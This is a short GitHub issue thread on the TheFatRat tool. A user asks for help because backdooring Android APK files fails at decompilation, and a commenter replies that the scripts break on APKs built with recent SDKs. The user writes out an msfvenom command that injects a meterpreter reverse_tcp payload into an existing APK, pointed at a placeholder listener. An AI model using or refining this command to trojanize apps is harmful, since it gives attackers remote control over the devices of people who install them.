### ISSUE TITLE
[!] Failed to decompile original APK file | Tried Everything  On Kali Linux 2018.1

### ISSUE THREAD

**Issue by BuzdarX** [Screetsec/TheFatRat#249]
Hi 
I am getting [!] Failed to decompile original APK file error ever time i try to backdoor an APk I tried multiple Apk's so its not the ApK I also tried multiple scripts but no luck i also tried using msfvenom by cammond like
msfvenom -x example.apk -p android/meterpreter/reverse_tcp lhost=x.x.x.x lport=xxxx -o exampleoutput.apk
but it is also stuck on decompileing APK 
so can anyone HELp please I have spent 4 days fixing it but nothing is working
please help!
Regards!
I am using Kali Linux 2018.1

**Comment by peterpt** [comment]
The apk scripts are not working with recent android apks builded in recent versions of android SDK .
